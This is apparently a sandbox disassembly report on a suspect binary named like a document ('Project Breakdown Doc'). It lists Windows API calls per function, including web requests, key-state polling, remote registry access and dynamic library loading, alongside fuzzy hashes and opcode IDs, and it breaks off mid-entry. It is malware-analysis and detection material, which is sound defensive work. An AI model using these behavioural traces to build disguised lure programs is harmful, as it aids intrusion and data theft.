                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 6c409dbbc8644dbb0052eb8c7e8572d71294534ec04fe503618fcedfe3c4d4d3
                                                  • Instruction ID: ff5b3f41d91d47aa67506ee1c9934f432686a1b25e728b163cdaed8f6baa6b78
                                                  • Opcode Fuzzy Hash: 6c409dbbc8644dbb0052eb8c7e8572d71294534ec04fe503618fcedfe3c4d4d3
                                                  • Instruction Fuzzy Hash: DE41B1306043129FD720DF28C884B1ABBE8FF86328F14465EF966972D2D770E905CB92
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CBDAD9
                                                    • Part of subcall function 00C479AB: _memmove.LIBCMT ref: 00C479F9
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C993F6
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C99409
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C99439
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB1B40
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB1B66
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CB1B96
                                                  • InternetCloseHandle.WININET(00000000), ref: 00CB1BDD
                                                    • Part of subcall function 00CB2777: GetLastError.KERNEL32(?,?,00CB1B0B,00000000,00000000,00000001), ref: 00CB278C
                                                    • Part of subcall function 00CB2777: SetEvent.KERNEL32(?,?,00CB1B0B,00000000,00000000,00000001), ref: 00CB27A1
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  APIs
                                                    • Part of subcall function 00C41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C41D73
                                                    • Part of subcall function 00C41D35: GetStockObject.GDI32(00000011), ref: 00C41D87
                                                    • Part of subcall function 00C41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C41D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC66D0
                                                  • LoadLibraryW.KERNEL32(?), ref: 00CC66D7
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC66EC
                                                  • DestroyWindow.USER32(?), ref: 00CC66F4
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00CA705E
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA7091
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00CA70A3
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CA70DD
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00CA712B
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA715D
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00CA716E
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CA71A8
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAAEBF
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CAAF13
                                                  • __swprintf.LIBCMT ref: 00CAAF2C
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CCF910), ref: 00CAAF6A
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  APIs
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                    • Part of subcall function 00C9A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9A399
                                                    • Part of subcall function 00C9A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9A3AC
                                                    • Part of subcall function 00C9A37C: GetCurrentThreadId.KERNEL32 ref: 00C9A3B3
                                                    • Part of subcall function 00C9A37C: AttachThreadInput.USER32(00000000), ref: 00C9A3BA
                                                  • GetFocus.USER32 ref: 00C9A554
                                                    • Part of subcall function 00C9A3C5: GetParent.USER32(?), ref: 00C9A3D3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C9A59D
                                                  • EnumChildWindows.USER32(?,00C9A615), ref: 00C9A5C5
                                                  • __swprintf.LIBCMT ref: 00C9A5DF
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                  • String ID: %s%d
                                                  • API String ID: 1941087503-1110647743
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CA2048
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CBEF1B
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CBEF4B
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CBF07E
                                                  • CloseHandle.KERNEL32(?), ref: 00CBF0FF
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00CC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0388
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC03C7
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CC040E
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00CC043A
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC0447
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: b00ebbb4d1638688a323fb9552a4137e75038e95ebf69d7c3d60e7f99b0cacf4
                                                  • Instruction ID: 6269acedc7f90214bbf8e0d651ecabb6d822ac6892bf7905c4c7cd948d87a473
                                                  • Opcode Fuzzy Hash: b00ebbb4d1638688a323fb9552a4137e75038e95ebf69d7c3d60e7f99b0cacf4
                                                  • Instruction Fuzzy Hash: 04513731208244EFD704EB64C885F6EB7E9FF84704F54892DF596872A2DB30E905EB52
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CBDC3B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00CBDCBE
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CBDCDA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00CBDD1B
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CBDD35
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7B20,?,?,00000000), ref: 00C45B8C
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7B20,?,?,00000000,?,?), ref: 00C45BB0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: 477bc8294c572b2c4e6e35d2c40a921e5a8e02cd0d1ffdb89606e5ff3735bb22
                                                  • Instruction ID: 258efbeef5525b8ad1bd373385353709a9a1f0c38df645e13a0887ede6d53b1b
                                                  • Opcode Fuzzy Hash: 477bc8294c572b2c4e6e35d2c40a921e5a8e02cd0d1ffdb89606e5ff3735bb22
                                                  • Instruction Fuzzy Hash: 8A511875A00615DFCB00EF68C484DAEBBF5FF58310B148069E85AAB362DB31AE45DF91
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CAE88A
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CAE8B3
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CAE8F2
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CAE917
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CAE91F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 39b1ad2a4d8cb12b04c63c690daef105c304ec160bc3ddf46d18211c2ec8b47b
                                                  • Instruction ID: 6ca9b212e6b25157fe8287c1eccdfbb424c945ef4d44dafd404d5d1e20bedfb5
                                                  • Opcode Fuzzy Hash: 39b1ad2a4d8cb12b04c63c690daef105c304ec160bc3ddf46d18211c2ec8b47b
                                                  • Instruction Fuzzy Hash: 6F511E35A00215DFCF11EF64C981AAEBBF5FF49314B148099E849AB362CB31ED51EB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94feebed9bb4a380e511a09d77865734a714bbf29693f70201fd435553af3d00
                                                  • Instruction ID: 39d5866db37f479307e0929c2549212863a8cfb422e3c8893a346b09e9707659
                                                  • Opcode Fuzzy Hash: 94feebed9bb4a380e511a09d77865734a714bbf29693f70201fd435553af3d00
                                                  • Instruction Fuzzy Hash: F141D23590024CAFC724DF28CC5CFA9BBA5EB09314F184169F965E72E1D770EE41DA61
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00C42357
                                                  • ScreenToClient.USER32(00D067B0,?), ref: 00C42374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00C42399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00C423A7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 25313c974ecfce66f9c5651911b4fd5d21628503846a32fe3742bb37488467d4
                                                  • Instruction ID: 1e3a57f4ebbd39f29956925ea0b55c1e4ac232417cf9532dec8df7b854ba61af
                                                  • Opcode Fuzzy Hash: 25313c974ecfce66f9c5651911b4fd5d21628503846a32fe3742bb37488467d4
                                                  • Instruction Fuzzy Hash: A541823550411AFBDF159F69C884FEDBB78FB05320F60836AF838962A1C7345A90EB91
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9695D
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00C969A9
                                                  • TranslateMessage.USER32(?), ref: 00C969D2
                                                  • DispatchMessageW.USER32(?), ref: 00C969DC
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C969EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: 949f3a07d715538119936cd63310a9c22314446acc0e058dd11d04242f08979e
                                                  • Instruction ID: da4164a666cfa9a49b81f5260326810137dafa22cedfc8fd0d27564b499acb4b
                                                  • Opcode Fuzzy Hash: 949f3a07d715538119936cd63310a9c22314446acc0e058dd11d04242f08979e
                                                  • Instruction Fuzzy Hash: A231A071900246AEDF208F75DC48FBA7BACAB01304F154169E425D72E1DB34D99AE7A0
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C98F12
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00C98FBC
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C98FC4
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00C98FD2
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C98FDA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 2535b8b5fdc4538445240c2710f5e1f9946b4fa70e8b56a9d6f0cf73db7dee9c
                                                  • Instruction ID: 4e8d2091704a09f947c58e03af655ed57f121ff521af205d1314612ec76972dc
                                                  • Opcode Fuzzy Hash: 2535b8b5fdc4538445240c2710f5e1f9946b4fa70e8b56a9d6f0cf73db7dee9c
                                                  • Instruction Fuzzy Hash: FA31CE71500219EFDF14CFA8D94CBAE7BB6EB05315F104229F925EB2D0C7B09A18DB90
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00C9B6C7
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C9B6E4
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C9B71C
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C9B742
                                                  • _wcsstr.LIBCMT ref: 00C9B74C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: ca255e2c8cf3657dc60f94cf9fb88af9c542a47049c93423f40590eea697c402
                                                  • Instruction ID: 05f8f6cac9a12f7ccf51076f4e16bbdf3fd91542583f98d88d8ae2801af15431
                                                  • Opcode Fuzzy Hash: ca255e2c8cf3657dc60f94cf9fb88af9c542a47049c93423f40590eea697c402
                                                  • Instruction Fuzzy Hash: A921F531204204BAEF255B79ED8DE7B7BA9DF85710F04413DFC05CA1A1EB61DD4196A0
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CCB44C
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CCB471
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CCB489
                                                  • GetSystemMetrics.USER32(00000004), ref: 00CCB4B2
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CB1184,00000000), ref: 00CCB4D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: a87de57041e5cba7a8b58c7c4182bb1d194d1375f4e6d49074599ad6b7d28909
                                                  • Instruction ID: 284b68f69d4d3e128fce726b1bb53296ccfb081687f552cbc13cf18f23d8c230
                                                  • Opcode Fuzzy Hash: a87de57041e5cba7a8b58c7c4182bb1d194d1375f4e6d49074599ad6b7d28909
                                                  • Instruction Fuzzy Hash: 35216B31918215AFCB18CFB9DC05F6A3BA5EB05720F14862CF936D72E2E7309D219B90
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C99802
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C99834
                                                  • __itow.LIBCMT ref: 00C9984C
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C99874
                                                  • __itow.LIBCMT ref: 00C99885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: 67a1930607702ccf9d43894e4fe0ee1b48ceada379481e6f7eded84bfc304acf
                                                  • Instruction ID: 98001641557291359d8294aa2101f4799b80e108f2128a1d1b22aed25f1b99ae
                                                  • Opcode Fuzzy Hash: 67a1930607702ccf9d43894e4fe0ee1b48ceada379481e6f7eded84bfc304acf
                                                  • Instruction Fuzzy Hash: 18218371A01248ABDF109B69CC8AFAE7BB9EF4A710F04402DF905DB291D6708D45D795
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C4134D
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4135C
                                                  • BeginPath.GDI32(?), ref: 00C41373
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4139C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 3618dc0658e252dba587ece831d3957ce598aef86da0e38528f8e3aca747f2e2
                                                  • Instruction ID: ba92f07a3d6d6aab24005081885a2f2edbec1dc3d5b3af93b2b20f4016a72a81
                                                  • Opcode Fuzzy Hash: 3618dc0658e252dba587ece831d3957ce598aef86da0e38528f8e3aca747f2e2
                                                  • Instruction Fuzzy Hash: 0C210C70900308EBDB119F25DC08B697BF9FB00761F58822AF968D66F0D771D9A1DBA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: e4bd2bb905355c4a46bc6c14b7397672fd82aff537fd063eb9350d96d8ab5984
                                                  • Instruction ID: 087493fb5aec08a706028f7ed71cf91a2cd29a3d48e6f78d94fbaff6af9f9652
                                                  • Opcode Fuzzy Hash: e4bd2bb905355c4a46bc6c14b7397672fd82aff537fd063eb9350d96d8ab5984
                                                  • Instruction Fuzzy Hash: F401B5B16041057BEA14A6219DC6FAF735CDB61394F484022FE1497383E690DF11D2F8
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00CA4D5C
                                                  • __beginthreadex.LIBCMT ref: 00CA4D7A
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00CA4D8F
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CA4DA5
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CA4DAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
